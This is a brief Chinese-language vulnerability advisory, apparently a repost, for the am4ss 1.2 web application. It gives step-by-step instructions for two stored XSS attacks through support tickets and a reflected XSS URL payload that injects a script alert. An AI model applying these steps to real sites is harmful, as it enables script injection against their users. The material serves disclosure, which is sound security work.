标题 : am4ss 1.2 <= Multiple Vulnerabilities 作者: s3n4t00r 影响版本 : all version XSS 存储型1 1- Register 2 - Login here [ http://localhost/am4ss/orderdev.php?step=2 ] 3- Create Ticket and add your code html or js 4- Show Tickets [ http://www.2cto.com /exp/am4ss/tickets.php ] XSSXSS 存储型2 1- Register 2 - Login here [ http://localhost/am4ss/hosting.php?do=order&planid=1&step=6 ] 3- Create Ticket and Change data [ domaine ] using Tamper Data 4- Show Tickets [ http://www.2cto.com /exp/am4ss/tickets.php ] XSS反射型 here : [ http://localhost/exp/am4ss/misc.php?do=deletemail&mail=(XSS) ] Example http://www.2cto.com /exp/am4ss/misc.php?do=deletemail&mail="><script>alert('Sec-w.com')</script>
查看更多关于am4ss 1.2 <= 三个xss - 网站安全 - 自学php的详细内容...